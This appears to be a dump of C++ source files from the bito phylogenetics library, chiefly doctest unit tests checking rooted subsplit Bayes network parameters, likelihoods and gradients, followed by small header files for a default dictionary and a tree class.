ReadNewickFile(const std::string& fname, const bool sort_taxa = true); void ReadNexusFile(const std::string& fname, const bool sort_taxa = true); void SetDatesToBeConstant(bool initialize_time_trees_using_branch_lengths); void ParseDatesFromTaxonNames(bool initialize_time_trees_using_branch_lengths); void ParseDatesFromCSV(const std::string& csv_path, bool initialize_time_trees_using_branch_lengths); }; #ifdef DOCTEST_LIBRARY_INCLUDED #include "doctest_constants.hpp" // Centered finite difference approximation of the derivative wrt rate. std::vector<double> DerivativeStrictClock(RootedSBNInstance& inst) { double eps = 0.00000001; std::vector<double> rates; std::vector<double> gradients; for (auto& tree : inst.tree_collection_.trees_) { rates.push_back(tree.rates_[0]); tree.rates_.assign(tree.rates_.size(), rates.back() - eps); } auto lm = inst.LogLikelihoods(); int i = 0; for (auto& tree : inst.tree_collection_.trees_) { tree.rates_.assign(tree.rates_.size(), rates[i++] + eps); } auto lp = inst.LogLikelihoods(); for (size_t index = 0; index < lm.size(); index++) { gradients.push_back((lp[index] - lm[index]) / (2. * eps)); } return gradients; } // Centered finite difference approximation of the derivative wrt to each rate. std::vector<std::vector<double>> DerivativeRelaxedClock(RootedSBNInstance& inst) { double eps = 0.00000001; std::vector<std::vector<double>> gradients; std::vector<double> lp; std::vector<double> lm; size_t edge_count = inst.TaxonCount() * 2 - 2; for (size_t index = 0; index < edge_count; index++) { std::vector<double> gradient; std::vector<double> rates; for (size_t i = 0; i < inst.tree_collection_.TreeCount(); i++) { double value = inst.tree_collection_.trees_[i].rates_[index]; rates.push_back(value); inst.tree_collection_.trees_[i].rates_[index] = rates.back() - eps; } lm = inst.LogLikelihoods(); for (size_t i = 0; i < inst.tree_collection_.TreeCount(); i++) { inst.tree_collection_.trees_[i].rates_[index] = rates[i] + eps; } lp = inst.LogLikelihoods(); for (size_t i = 0; i < inst.tree_collection_.TreeCount(); i++) { inst.tree_collection_.trees_[i].rates_[index] = rates[i]; gradient.push_back((lp[i] - lm[i]) / (2. * eps)); } gradients.push_back(gradient); } return gradients; } RootedSBNInstance MakeFiveTaxonRootedInstance() { RootedSBNInstance inst("charlie"); inst.ReadNewickFile("data/five_taxon_rooted.nwk", false); inst.ProcessLoadedTrees(); return inst; } TEST_CASE("RootedSBNInstance: subsplit support and TrainSimpleAverage") { auto inst = MakeFiveTaxonRootedInstance(); auto pretty_indexer = inst.PrettyIndexer(); StringSet pretty_indexer_set{pretty_indexer.begin(), pretty_indexer.end()}; // The indexer_ is to index the sbn_parameters_. Note that neither of these // data structures attempt to catalog the complete collection of rootsplits or // PCSPs, but just those that are present in the the input trees. // // The indexer_ and sbn_parameters_ are laid out as follows (I'll just call it // the "index" in what follows). Say there are rootsplit_count rootsplits in // the support. // The first rootsplit_count entries of the index are assigned to the // rootsplits (again, those rootsplits that are present for some rooting of // the unrooted input trees). The rest of the entries of the index are laid out as // blocks of parameters for PCSPs that share the same parent. Take a look at the // description of PCSP bitsets (and the unit tests) in bitset.hpp to understand the // notation used here. // // In contrast to the unrooted case, we can write out the pretty indexer here and // verify it by hand. There is the block structure in which the two children of // 10000|01111 are grouped together. StringSet correct_pretty_indexer_set{ "00000|11111|00111", // ((x0,x1),(x2,(x3,x4))) "00000|11111|01111", // (x0,(((x1,x3),x2),x4)) and ((x1,((x2,x4),x3)),x0) "00000|11111|00010", // (x3,((x0,(x4,x1)),x2)) "00100|01010|00010", // ((x1,x3),x2) "00111|11000|01000", // ((x0,x1),(x2,(x3,x4))) "00100|00011|00001", // (x2,(x3,x4)) "11000|00111|00011", // ((x0,x1),(x2,(x3,x4))) "00100|11001|01001", // ((x0,(x4,x1)),x2) "10000|01001|00001", // (x0,(x4,x1)) "01000|00111|00010", // (x1,((x2,x4),x3)) "10000|01111|00001", // (x0,(((x1,x3),x2),x4)) "10000|01111|00111", // ((x1,((x2,x4),x3)),x0) "00010|00101|00001", // ((x2,x4),x3) "00001|01110|00100", // (((x1,x3),x2),x4) "00010|11101|00100" // (x3,((x0,(x4,x1)),x2)) }; CHECK_EQ(pretty_indexer_set, correct_pretty_indexer_set); // Test of rooted IndexerRepresentationOf. // Topology is ((0,1),(2,(3,4)));, or with internal nodes ((0,1)5,(2,(3,4)6)7)8; auto indexer_test_rooted_topology = Node::OfParentIdVector({5, 5, 7, 6, 6, 8, 7, 8}); auto correct_rooted_indexer_representation = StringSet({"00000|11111|00111", "11000|00111|00011", "00100|00011|00001", "00111|11000|01000"}); CHECK_EQ(inst.StringIndexerRepresentationOf(indexer_test_rooted_topology, out_of_sample_index), correct_rooted_indexer_representation); inst.TrainSimpleAverage(); StringVector correct_taxon_names({"x0", "x1", "x2", "x3", "x4"}); CHECK_EQ(inst.SBNSupport().TaxonNames(), correct_taxon_names); StringDoubleVector correct_parameters({{"00000|11111|00111", 0.25}, {"00000|11111|01111", 0.5}, {"00000|11111|00010", 0.25}, {"00100|01010|00010", 1}, {"00111|11000|01000", 1}, {"00100|00011|00001", 1}, {"11000|00111|00011", 1}, {"00100|11001|01001", 1}, {"10000|01001|00001", 1}, {"01000|00111|00010", 1}, {"10000|01111|00001", 0.5}, {"10000|01111|00111", 0.5}, {"00010|00101|00001", 1}, {"00001|01110|00100", 1}, {"00010|11101|00100", 1}}); std::sort(correct_parameters.begin(), correct_parameters.end()); auto parameters = inst.PrettyIndexedSBNParameters(); std::sort(parameters.begin(), parameters.end()); CHECK_EQ(correct_parameters.size(), parameters.size()); for (size_t i = 0; i < correct_parameters.size(); i++) { CHECK_EQ(correct_parameters[i].first, parameters[i].first); CHECK_LT(fabs(correct_parameters[i].second - parameters[i].second), 1e-8); } } TEST_CASE("RootedSBNInstance: UnconditionalSubsplitProbabilities") { RootedSBNInstance inst("rooted instance"); inst.ReadNewickFile("data/five_taxon_rooted_more.nwk", false); inst.ProcessLoadedTrees(); inst.TrainSimpleAverage(); // See diagram at https://github.com/phylovi/bito/issues/349#issuecomment-898022916 // Numbering in comments is... node: subsplit. StringDoubleMap correct_parameters({{"1100000111", 0.5}, // 10: 01|234 {"1000001111", 0.3}, // 15: 0|1234 {"1110100010", 0.2}, // 19: 0124|3 {"1100100100", 0.2}, // 18: 014|2 {"0100000111", 0.1}, // 14: 1|234 {"0111000001", 0.2}, // 13: 123|4 {"0101000100", 0.2}, // 12: 13|2 {"1000001001", 0.2}, // 17: 0|14 {"0010000011", 0.4}, // 8: 2|34 {"0011000001", 0.2}, // 6: 23|4 {"1000001000", 0.5}, // 9: 0|1 {"0100000010", 0.2}, // 11: 1|3 {"0100000001", 0.2}, // 16: 1|4 {"0010000010", 0.2}, // 5: 2|3 {"0001000001", 0.4}} // 7: 3|4 ); auto subsplit_probabilities = inst.UnconditionalSubsplitProbabilities(); CHECK_EQ(correct_parameters.size(), subsplit_probabilities.size()); for (const auto& [subsplit, probability] : subsplit_probabilities) { CHECK_LT(fabs(correct_parameters.at(subsplit.ToString()) - probability), 1e-8); } } // Instance SA-trained on a sample of 20-taxon trees. RootedSBNInstance MakeRootedSimpleAverageInstance() { RootedSBNInstance inst("rooted instance"); inst.ReadNewickFile("data/rooted_simple_average.nwk", false); inst.ProcessLoadedTrees(); inst.TrainSimpleAverage(); return inst; } TEST_CASE("RootedSBNInstance: TrainSimpleAverage on 20 taxa") { auto inst = MakeRootedSimpleAverageInstance(); auto results = inst.PrettyIndexedSBNParameters(); // Values confirmed with // https://github.com/mdkarcher/vbsupertree/commit/b7f87f711e8a1044b7c059b5a92e94c117d8cee1 auto correct_map = CSV::StringDoubleMapOfCSV("data/rooted_simple_average_results.csv"); for (const auto& [found_string, found_probability] : results) { CHECK(fabs(found_probability - correct_map.at(found_string)) < 1e-6); } } RootedSBNInstance MakeFluInstance(bool initialize_time_trees) { RootedSBNInstance inst("charlie"); inst.ReadNewickFile("data/fluA.tree", false); inst.ParseDatesFromTaxonNames(initialize_time_trees); inst.ReadFastaFile("data/fluA.fa"); PhyloModelSpecification simple_specification{"JC69", "constant", "strict"}; inst.PrepareForPhyloLikelihood(simple_specification, 1); return inst; } TEST_CASE("RootedSBNInstance: gradients") { auto inst = MakeFluInstance(true); for (auto& tree : inst.tree_collection_.trees_) { tree.rates_.assign(tree.rates_.size(), 0.001); } auto likelihood = inst.LogLikelihoods(); double physher_ll = -4777.616349; double physher_jacobian = -9.25135166; double physher_ll_jacobian = physher_ll + physher_jacobian; CHECK_LT(fabs(likelihood[0] - physher_ll_jacobian), 0.0001); auto gradients = inst.PhyloGradients(); std::vector<double> physher_gradients = { -0.593654, 6.441290, 11.202945, 5.173924, -0.904631, 2.731402, 3.157131, 7.082914, 10.305417, 13.988206, 20.709336, 48.897993, 99.164949, 130.205747, 17.314019, 21.033290, -1.336335, 12.259822, 22.887291, 27.176564, 47.487426, 3.637276, 12.955169, 15.315953, 83.254605, -3.806996, 105.385095, 4.874023, 22.754466, 6.036534, 25.651478, 29.535185, 29.598789, 1.817247, 10.598685, 76.259248, 56.481423, 10.679778, 6.587179, 3.330556, -4.622247, 33.417304, 63.415767, 188.809515, 23.540875, 17.421076, 1.222568, 22.372012, 34.239511, 3.486115, 4.098873, 13.200954, 19.726890, 96.808738, 4.240029, 7.414585, 48.871694, 3.488516, 82.969065, 9.009334, 8.032474, 3.981016, 6.543650, 53.702423, 37.835952, 2.840831, 7.517186, 19.936861}; for (size_t i = 0; i < physher_gradients.size(); i++) { CHECK_LT(fabs(gradients[0].gradient_[PhyloGradient::ratios_root_height_key_][i] - physher_gradients[i]), 0.0001); } CHECK_LT(fabs(gradients[0].log_likelihood_ - physher_ll), 0.0001); } TEST_CASE("RootedSBNInstance: clock gradients") { auto inst = MakeFluInstance(true); for (auto& tree : inst.tree_collection_.trees_) { tree.rates_.assign(tree.rates_.size(), 0.001); } auto likelihood = inst.LogLikelihoods(); double physher_ll = -4777.616349; double physher_jacobian = -9.25135166; double physher_ll_jacobian = physher_ll + physher_jacobian; CHECK_LT(fabs(likelihood[0] - physher_ll_jacobian), 0.0001); // Gradient with a strict clock. auto gradients_strict = inst.PhyloGradients(); std::vector<double> gradients_strict_approx = DerivativeStrictClock(inst); CHECK_LT(fabs(gradients_strict[0].gradient_[PhyloGradient::clock_model_key_][0] - gradients_strict_approx[0]), 0.001); CHECK_LT(fabs(gradients_strict[0].log_likelihood_ - physher_ll), 0.001); // Gradient with a "relaxed" clock. auto& tree = inst.tree_collection_.trees_[0]; // Make a clock with some rate variation. for (size_t i = 0; i < tree.rates_.size(); i++) { tree.rates_[i] *= i % 3 + 1.0; } tree.rate_count_ = tree.rates_.size(); auto gradients_relaxed = inst.PhyloGradients(); auto gradients_relaxed_approx = DerivativeRelaxedClock(inst); for (size_t j = 0; j < gradients_relaxed_approx.size(); j++) { CHECK_LT(fabs(gradients_relaxed[0].gradient_[PhyloGradient::clock_model_key_][j] - gradients_relaxed_approx[j][0]), 0.001); } } TEST_CASE("RootedSBNInstance: GTR gradients") { auto inst = MakeFluInstance(true); PhyloModelSpecification gtr_specification{"GTR", "constant", "strict"}; inst.PrepareForPhyloLikelihood(gtr_specification, 1); for (auto& tree : inst.tree_collection_.trees_) { tree.rates_.assign(tree.rates_.size(), 0.001); } auto param_block_map = inst.GetPhyloModelParamBlockMap(); EigenVectorXdRef frequencies = param_block_map.at(GTRModel::frequencies_key_); EigenVectorXdRef rates = param_block_map.at(GTRModel::rates_key_); frequencies << 0.1, 0.2, 0.3, 0.4; rates << 0.05, 0.1, 0.15, 0.20, 0.25, 0.25; auto likelihood = inst.LogLikelihoods(); double phylotorch_ll = -5221.438941335706; double physher_jacobian = -9.25135166; double expected_ll_jacobian = phylotorch_ll + physher_jacobian; CHECK_LT(fabs(likelihood[0] - expected_ll_jacobian), 0.001); auto gradients = inst.PhyloGradients(); std::vector<double> phylotorch_gradients = {49.06451538, 151.83105912, 26.40235659, -8.25135661, 75.29759338, 352.56545247, 90.07046995, 30.12301652}; for (size_t i = 0; i < phylotorch_gradients.size(); i++) { CHECK_LT(fabs(gradients[0].gradient_[PhyloGradient::substitution_model_key_][i] - phylotorch_gradients[i]), 0.001); } CHECK_LT(fabs(gradients[0].log_likelihood_ - phylotorch_ll), 0.001); } TEST_CASE("RootedSBNInstance: HKY gradients") { auto inst = MakeFluInstance(true); PhyloModelSpecification specification{"HKY", "constant", "strict"}; inst.PrepareForPhyloLikelihood(specification, 1); for (auto& tree : inst.tree_collection_.trees_) { tree.rates_.assign(tree.rates_.size(), 0.001); } auto param_block_map = inst.GetPhyloModelParamBlockMap(); EigenVectorXdRef frequencies = param_block_map.at(SubstitutionModel::frequencies_key_); EigenVectorXdRef rates = param_block_map.at(SubstitutionModel::rates_key_); frequencies << 0.1, 0.2, 0.3, 0.4; rates << 3.0; auto likelihood = inst.LogLikelihoods(); double phylotorch_ll = -4931.770106816288; double physher_jacobian = -9.25135166; double expected_ll_jacobian = phylotorch_ll + physher_jacobian; CHECK_LT(fabs(expected_ll_jacobian - likelihood[0]), 0.001); auto gradients = inst.PhyloGradients(); std::vector<double> phylotorch_gradients = {18.218397759598506, 309.56536079428355, 47.15713892857574, 42.98132033283943}; for (size_t i = 0; i < phylotorch_gradients.size(); i++) { CHECK_LT( fabs(gradients[0].gradient_["substitution_model"][i] - phylotorch_gradients[i]), 0.001); } CHECK_LT(fabs(phylotorch_ll - gradients[0].log_likelihood_), 0.0001); } TEST_CASE("RootedSBNInstance: Weibull gradients") { auto inst = MakeFluInstance(true); PhyloModelSpecification weibull_specification{"JC69", "weibull+4", "strict"}; inst.PrepareForPhyloLikelihood(weibull_specification, 1); for (auto& tree : inst.tree_collection_.trees_) { tree.rates_.assign(tree.rates_.size(), 0.001); } auto param_block_map = inst.GetPhyloModelParamBlockMap(); param_block_map.at(WeibullSiteModel::shape_key_).setConstant(0.1); auto likelihood = inst.LogLikelihoods(); double physher_ll = -4618.2062529058; double physher_jacobian = -9.25135166; double physher_ll_jacobian = physher_ll + physher_jacobian; CHECK_LT(fabs(likelihood[0] - physher_ll_jacobian), 0.0001); // Gradient wrt Weibull site model. auto gradients = inst.PhyloGradients(); double physher_gradient = -5.231329; CHECK_LT(fabs(gradients[0].gradient_["site_model"][0] - physher_gradient), 0.001); CHECK_LT(fabs(gradients[0].log_likelihood_ - physher_ll), 0.001); } TEST_CASE("RootedSBNInstance: parsing dates") { RootedSBNInstance inst("charlie"); inst.ReadNexusFile("data/test_beast_tree_parsing.nexus", false); inst.ParseDatesFromTaxonNames(true); std::vector<double> dates; for (const auto& [tag, date] : inst.tree_collection_.GetTagDateMap()) { std::ignore = tag; dates.push_back(date); } std::sort(dates.begin(), dates.end()); CHECK_EQ(dates[0], 0); CHECK_EQ(dates.back(), 80.0); RootedSBNInstance alt_inst("betty"); alt_inst.ReadNexusFile("data/test_beast_tree_parsing.nexus", false); alt_inst.tree_collection_.ParseDatesFromCSV("data/test_beast_tree_parsing.csv", true); CHECK_EQ(inst.tree_collection_.GetTagDateMap(), alt_inst.tree_collection_.GetTagDateMap()); } TEST_CASE("RootedSBNInstance: uninitialized time trees raise an exception") { auto inst = MakeFluInstance(false); CHECK_THROWS(inst.PhyloGradients()); } TEST_CASE("RootedSBNInstance: reading SBN parameters from a CSV") { auto inst = MakeFiveTaxonRootedInstance(); inst.ReadSBNParametersFromCSV("data/test_modifying_sbn_parameters.csv"); auto pretty_indexer = inst.PrettyIndexer(); auto gpcsp_it = std::find(pretty_indexer.begin(), pretty_indexer.end(), "10000|01111|00001"); CHECK(gpcsp_it != pretty_indexer.end()); auto gpcsp_idx = std::distance(pretty_indexer.begin(), gpcsp_it); CHECK_LT(fabs(inst.sbn_parameters_[gpcsp_idx] - log(0.15)), 1e-8); inst.SetSBNParameters({}, false); CHECK_EQ(inst.sbn_parameters_[gpcsp_idx], DOUBLE_MINIMUM); CHECK_THROWS(inst.SetSBNParameters({{"10000|01111|00001", -5.}}, false)); } TEST_CASE("RootedSBNInstance: SBN parameter round trip") { std::string csv_test_file_path = "_ignore/for_sbn_parameter_round_trip.csv"; auto inst = MakeRootedSimpleAverageInstance(); auto original_normalized_sbn_parameters = inst.NormalizedSBNParameters(); inst.SBNParametersToCSV(csv_test_file_path); inst.ReadSBNParametersFromCSV(csv_test_file_path); auto reloaded_normalized_sbn_parameters = inst.NormalizedSBNParameters(); CheckVectorXdEquality(original_normalized_sbn_parameters, reloaded_normalized_sbn_parameters, 1e-6); } TEST_CASE("RootedSBNInstance: BuildCollectionByDuplicatingFirst") { auto empty_collection = RootedTreeCollection(); CHECK_THROWS(empty_collection.BuildCollectionByDuplicatingFirst(5)); auto inst = MakeFiveTaxonRootedInstance(); auto trees = inst.tree_collection_.BuildCollectionByDuplicatingFirst(5); CHECK_EQ(trees.GetTree(0), trees.GetTree(1)); // Check that the trees don't refer to the same place in memory. CHECK_NE(&trees.GetTree(0), &trees.GetTree(1)); inst = MakeFluInstance(true); auto& base_flu_tree = inst.tree_collection_.GetTree(0); trees = inst.tree_collection_.BuildCollectionByDuplicatingFirst(5); CHECK_EQ(base_flu_tree, trees.GetTree(1)); } TEST_CASE("RootedSBNInstance: PhyloFlags for Gradient Requests") { // GP Instance default output for gradients. auto CreateNewInstance = []() { auto inst = MakeFluInstance(true); PhyloModelSpecification gtr_specification{"GTR", "constant", "strict"}; inst.PrepareForPhyloLikelihood(gtr_specification, 1); for (auto& tree : inst.tree_collection_.trees_) { tree.rates_.assign(tree.rates_.size(), 0.001); } auto param_block_map = inst.GetPhyloModelParamBlockMap(); EigenVectorXdRef frequencies = param_block_map.at(GTRModel::frequencies_key_); EigenVectorXdRef rates = param_block_map.at(GTRModel::rates_key_); frequencies << 0.1, 0.2, 0.3, 0.4; rates << 0.05, 0.1, 0.15, 0.20, 0.25, 0.25; return inst; }; // "Golden" instance for determining correctness. auto gold_inst = CreateNewInstance(); auto gold_likelihoods = gold_inst.LogLikelihoods(); auto gold_gradients = gold_inst.PhyloGradients(); size_t num_trees = gold_inst.tree_collection_.trees_.size(); using FlagMap = std::map<PhyloFlagOption, PhyloMapkey>; using FlagVector = std::vector<PhyloFlagOption>; using MapkeyVector = std::vector<PhyloMapkey>; // Split map into keys and values. auto SplitMapIntoKeysAndValues = [](const FlagMap& map) -> std::pair<FlagVector, MapkeyVector> { FlagVector keys; MapkeyVector values; for (const auto& [key, value] : map) { keys.push_back(key); values.push_back(value); } return std::make_pair(keys, values); }; // Iterate through all flag combinations. auto IterateOverAllCombinations = [](FlagMap& all_flags_mapkeys, FlagVector& all_flags, std::function<void(FlagMap&, FlagMap&, FlagMap&, bool)> func) { size_t num_flags = all_flags_mapkeys.size(); size_t num_combinations = pow(2, num_flags); for (size_t i = 0; i < num_combinations; i++) { FlagMap used_flags_mapkeys, unused_flags_mapkeys; // Split between groups of used and unused flags. for (size_t j = 1, k = 0; j < num_combinations; j <<= 1, k += 1) { if ((j & i)) { used_flags_mapkeys.insert(*all_flags_mapkeys.find(all_flags[k])); } else { unused_flags_mapkeys.insert(*all_flags_mapkeys.find(all_flags[k])); } } func(used_flags_mapkeys, unused_flags_mapkeys, all_flags_mapkeys, false); func(used_flags_mapkeys, unused_flags_mapkeys, all_flags_mapkeys, true); } }; // Test that expected flagged keys are populated with correct data, // and that unflagged keys are not stored in map. auto ComparePhyloGradients = [&CreateNewInstance, &gold_gradients, &SplitMapIntoKeysAndValues, &num_trees]( FlagMap& used_flags_mapkeys, FlagMap& unused_flags_mapkeys, FlagMap& all_flags, bool pass_externally = false) { // Create instance and run phylogradients with used_flags. auto inst = CreateNewInstance(); const auto [used_flags, used_mapkeys] = SplitMapIntoKeysAndValues(used_flags_mapkeys); const auto [unused_flags, unused_mapkeys] = SplitMapIntoKeysAndValues(unused_flags_mapkeys); std::ignore = unused_flags; std::vector<PhyloGradient> gradients; // pass flags via external arguments if (pass_externally) { PhyloFlags phylo_flags; for (const auto& flag : used_flags) { phylo_flags.SetFlag(flag); } phylo_flags.SetRunDefaultsFlag(false); gradients = inst.PhyloGradients(phylo_flags); } // pass flags via internal instance else { inst.MakePhyloFlags(); auto& flags = inst.GetPhyloFlags(); for (const auto& flag : used_flags) { flags.SetFlag(flag); } flags.SetRunDefaultsFlag(false); gradients = inst.PhyloGradients(); flags.ClearFlags(); } // Check that used fields are keyed and populated correctly. for (size_t i = 0; i < num_trees; i++) { auto& grad_map = gradients[i].gradient_; auto& gold_grad_map = gold_gradients[i].gradient_; // Check used fields are not properly populated. for (const auto& used_mapkey : used_mapkeys) { CHECK_MESSAGE(grad_map.find(used_mapkey.GetKey()) != grad_map.end(), "grad_map does not have a key that should exist."); auto& gold_grad_data = gold_grad_map[used_mapkey.GetKey()]; auto& grad_data = grad_map[used_mapkey.GetKey()]; DoubleVector abs_diff = DoubleVector(gold_grad_data.size()); std::transform(gold_grad_data.begin(), gold_grad_data.end(), grad_data.begin(), abs_diff.begin(), [](const double a, const double b) { return abs(a - b); }); double max_diff = *std::max_element(abs_diff.begin(), abs_diff.end()); CHECK_MESSAGE(max_diff < 0.01, "gold_grad_map and grad_map did not produce the same data " "for the same flag."); } // Check unused fields are not populated. for (const auto& unused_mapkey : unused_mapkeys) { CHECK_MESSAGE(grad_map.find(unused_mapkey.GetKey()) == grad_map.end(), "grad_map has a key that should not exist."); } } }; // Test gradient "include" options. // Pairs of input flags to output mapkeys. FlagMap gradient_flags_mapkeys; gradient_flags_mapkeys.insert( {PhyloGradientFlagOptions::clock_model_, PhyloGradientMapkeys::clock_model_}); gradient_flags_mapkeys.insert({PhyloGradientFlagOptions::ratios_root_height_, PhyloGradientMapkeys::ratios_root_height_}); gradient_flags_mapkeys.insert({PhyloGradientFlagOptions::substitution_model_, PhyloGradientMapkeys::substitution_model_}); gradient_flags_mapkeys.insert({PhyloGradientFlagOptions::substitution_model_, PhyloGradientMapkeys::substitution_model_rates_}); gradient_flags_mapkeys.insert( {PhyloGradientFlagOptions::substitution_model_, PhyloGradientMapkeys::substitution_model_frequencies_}); auto gradient_flags = SplitMapIntoKeysAndValues(gradient_flags_mapkeys).first; IterateOverAllCombinations(gradient_flags_mapkeys, gradient_flags, ComparePhyloGradients); // Test likelihood "exclude" options. auto LikelihoodExcludeLogDeterminant = [&CreateNewInstance, &gold_likelihoods]() { auto inst = CreateNewInstance(); StringBoolVector flag_vector = { {LogLikelihoodFlagOptions::include_log_det_jacobian_likelihood_.GetFlag(), false}}; auto flags = PhyloFlags(flag_vector, true); double likelihood_exclude_log_det = inst.LogLikelihoods(flags)[0]; double log_det = RootedGradientTransforms::LogDetJacobianHeightTransform( inst.tree_collection_.trees_[0]); double gold_likelihood = gold_likelihoods[0]; CHECK_MESSAGE( gold_likelihood != likelihood_exclude_log_det, "LogLikelihood should not be equal to (LogLikelihoodExcludingLogdet."); CHECK_MESSAGE(gold_likelihood == (likelihood_exclude_log_det + log_det), "LogLikelihood should be equal to (LogLikelihoodExcludingLogdet + " "LogDetJacobianHeightTransform."); }; LikelihoodExcludeLogDeterminant(); // Test gradient "exclude" options. auto GradientExcludeLogDeterminant = [&CreateNewInstance, &gold_gradients]() { auto inst = CreateNewInstance(); StringBoolVector flag_vector = { {PhyloGradientFlagOptions::include_log_det_jacobian_gradient_.GetFlag(), false}}; auto flags = PhyloFlags(flag_vector, true); GradientMap grad_map = inst.PhyloGradients(flags)[0].gradient_; DoubleVector exclude_log_det = grad_map[PhyloGradientMapkeys::ratios_root_height_.GetKey()]; DoubleVector log_det = RootedGradientTransforms::GradientLogDeterminantJacobian( inst.tree_collection_.trees_[0]); DoubleVector include_log_det = gold_gradients[0].gradient_[PhyloGradientMapkeys::ratios_root_height_.GetKey()]; double max_diff; DoubleVector abs_diff = DoubleVector(include_log_det.size()); std::transform(include_log_det.begin(), include_log_det.end(), exclude_log_det.begin(), abs_diff.begin(), [](const double a, const double b) { return abs(a - b); }); max_diff = *std::max_element(abs_diff.begin(), abs_diff.end()); CHECK_MESSAGE(max_diff > 0.01, "Gradient should not be equal to GradientExcludingLogDet."); DoubleVector exclude_log_det_plus_log_det = DoubleVector(include_log_det.size()); std::transform(exclude_log_det.begin(), exclude_log_det.end(), log_det.begin(), exclude_log_det_plus_log_det.begin(), [](const double a, const double b) { return a + b; }); std::transform(include_log_det.begin(), include_log_det.end(), exclude_log_det_plus_log_det.begin(), abs_diff.begin(), [](const double a, const double b) { return abs(a - b); }); max_diff = *std::max_element(abs_diff.begin(), abs_diff.end()); CHECK_MESSAGE(max_diff < 0.01, "Gradient should be equal to (GradientExcludingLogdet + " "GradientLogDetJacobian)."); }; GradientExcludeLogDeterminant(); // Test gradient "set" options. auto GradientSetDelta = [&CreateNewInstance, &gold_gradients]() { std::ignore = gold_gradients; auto inst = CreateNewInstance(); StringDoubleVector flag_vector = { {PhyloGradientFlagOptions::set_gradient_delta_.GetFlag(), 1.0e1}}; auto flags = PhyloFlags(flag_vector, true); GradientMap grad_map = inst.PhyloGradients(flags)[0].gradient_; DoubleVector subst_grad = grad_map[PhyloGradientMapkeys::substitution_model_.GetKey()]; // delta = 1.0e-6 (default) DoubleVector gold_subst_grad_1e6 = {49.0649, 151.831, 26.4022, -8.25114, 75.2975, 352.565, 90.0701, 30.1228}; // delta = 1.0e1 DoubleVector gold_subst_grad_1e1 = {-73.2611, 25.4074, -33.2865, -54.0479, 47.9938, -2696.06, -84.2954, 6.0563}; DoubleVector abs_diff = DoubleVector(subst_grad.size()); std::transform(subst_grad.begin(), subst_grad.end(), gold_subst_grad_1e1.begin(), abs_diff.begin(), [](const double a, const double b) { return abs(a - b); }); double max_diff = *std::max_element(abs_diff.begin(), abs_diff.end()); CHECK_MESSAGE(max_diff < 0.01, "Delta value set by flag did not result in correct gradient values."); }; GradientSetDelta(); } #endif // DOCTEST_LIBRARY_INCLUDED
32,907
C++
.h
645
43.195349
93
0.654944
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,095
default_dict.hpp
phylovi_bito/src/default_dict.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <iostream> #include <unordered_map> #include <utility> #include "sugar.hpp" template <class Key, class T> class DefaultDict { public: using iterator = typename std::unordered_map<Key, T>::iterator; using const_iterator = typename std::unordered_map<Key, T>::const_iterator; explicit DefaultDict(T default_value) : default_value_(default_value) {} size_t size() const { return map_.size(); } iterator begin() { return map_.begin(); } iterator end() { return map_.end(); } // Range-based for loops use const begin rather than cbegin. // https://stackoverflow.com/a/45732500/467327 const_iterator begin() const { return map_.begin(); } const_iterator end() const { return map_.end(); } std::unordered_map<Key, T> Map() const { return map_; } T at(const Key &key) { return AtWithDefault(map_, key, default_value_); } bool contains(const Key &key) const { return (map_.find(key) != map_.end()); } void increment(const Key &key, const T &value) { auto search = map_.find(key); if (search == map_.end()) { SafeInsert(map_, key, value); } else { search->second += value; } } void increment(Key &&key, T value) { auto search = map_.find(key); if (search == map_.end()) { SafeInsert(map_, key, value); } else { search->second += value; } } void print() const { std::cout << "Default value: " << default_value_ << std::endl; for (const auto &iter : map_) { std::cout << std::to_string(iter.first) << " " << std::to_string(iter.second) << std::endl; } } private: const T default_value_; std::unordered_map<Key, T> map_; }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("DefaultDict") { auto d = DefaultDict<int, int>(0); CHECK_EQ(d.at(4), 0); d.increment(4, 5); CHECK_EQ(d.at(4), 5); d.increment(4, 2); CHECK_EQ(d.at(4), 7); } #endif // DOCTEST_LIBRARY_INCLUDED
2,053
C++
.h
60
30.516667
83
0.648457
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,096
tree.hpp
phylovi_bito/src/tree.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <iostream> #include <memory> #include <string> #include <unordered_map> #include <vector> #include "node.hpp" #include "sugar.hpp" class Tree { public: using TreeVector = std::vector<Tree>; using BranchLengthVector = std::vector<double>; Tree() = default; // This is the primary constructor. The branch lengths are indexed according to the // numbering of the nodes of the tree (see node.hpp for details on how that works.) explicit Tree(const Node::NodePtr& topology, BranchLengthVector branch_lengths); // This constructor takes a map of tags to branch lengths; this map gets // turned into a branch length vector. It re-ids the topology. Note: any // missing branch lengths are set to zero. explicit Tree(const Node::NodePtr& topology, TagDoubleMap branch_lengths); const Node::NodePtr Topology() const { return topology_; } const BranchLengthVector& BranchLengths() const { return branch_lengths_; } uint32_t LeafCount() const { return Topology()->LeafCount(); } Node::NodePtrVec Children() const { return Topology()->Children(); } size_t Id() const { return Topology()->Id(); } std::vector<size_t> ParentIdVector() const { return Topology()->ParentIdVector(); } Tree DeepCopy() const; bool operator==(const Tree& other) const; std::string Newick() const { return Newick(std::nullopt); } std::string Newick(const TagStringMapOption& node_labels) const; std::string NewickTopology(const TagStringMapOption& node_labels) const; double BranchLength(const Node* node) const; // Take a bifurcating tree and move the root position so that the left hand // branch has zero branch length. Modifies tree in place. void SlideRootPosition(); // Build a tree from a topology using unit branch lengths. static Tree UnitBranchLengthTreeOf(Node::NodePtr topology); static Tree OfParentIdVector(const std::vector<size_t>& indices); static TreeVector ExampleTrees(); // We make branch lengths public so we can muck with them in Python. BranchLengthVector branch_lengths_; protected: Node::NodePtr topology_; }; inline bool operator!=(const Tree& lhs, const Tree& rhs) { return !(lhs == rhs); } #ifdef DOCTEST_LIBRARY_INCLUDED // Lots of tests in UnrootedTree and RootedTree. TEST_CASE("Tree") {} #endif // DOCTEST_LIBRARY_INCLUDED
2,446
C++
.h
51
45.333333
85
0.753574
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,097
ProgressBar.hpp
phylovi_bito/src/ProgressBar.hpp
